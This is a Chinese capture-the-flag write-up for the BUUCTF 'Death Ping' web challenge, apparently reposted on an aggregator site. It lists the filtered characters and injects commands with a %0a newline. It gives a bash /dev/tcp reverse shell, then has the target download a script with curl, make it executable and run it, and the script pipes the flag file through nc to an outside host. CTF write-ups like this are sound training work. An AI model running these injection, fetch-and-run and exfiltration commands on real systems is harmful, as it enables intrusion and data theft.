BUUCTF–[第二章 web進階]死亡ping命令

本文只是對官方wp進行了一點修改，因為在測試過程中發(fā)現(xiàn)8080端口彈不回flag，在本地測試也是一樣的結果，但是把端口修改成8089，其他端口應該也可以,并且nc監(jiān)聽方式為：nc -lvp 8089，flag的值才能彈回。

開啟環(huán)境發(fā)現(xiàn)是一個ping的頁面，通過ping可以發(fā)現(xiàn)是存在一些黑名單過濾的，被攔截時候顯示IP包含惡意字符。

利用fuzz的方式能夠知道過濾了以下字符:

["$", "{", "}", "`", ";", "&", "|", "(", ")", "\"", "'", "~", "!", "@", "#", "%", "^", "*", "[", "]", "\\", ":", "-", "_"];

通過%0a能夠注入新的一條命令進行執(zhí)行。

ip=127.0.0.1%0als

由于docker是沒有bash、python程序的，并且sh反彈是不行的。

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

目前是能通過折中的方式執(zhí)行任意命令，用小號在BUU上開一個內(nèi)網(wǎng)的主機

編寫1.sh，內(nèi)容如下：

ls cat /FLAG | nc your_buu_ip 8089

把他復制到網(wǎng)站根目錄
在靶機上用curl下載

127.0.0.1%0acurl your_buu_ip/1.sh > /tmp/1.sh #請求bash文件到tmp目錄

127.0.0.1%0achmod 777 /tmp/1.sh #給bash加權限

nc -lvp 8089 #your_buu_ip的機器上進行監(jiān)聽8089端口 127.0.0.1%0ash /tmp/1.sh #執(zhí)行bash文件

ps：

個人站點博客：XingHe，歡迎來踩~

總結

以上是生活随笔為你收集整理的BUUCTF--[第二章 web进阶]死亡ping命令的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。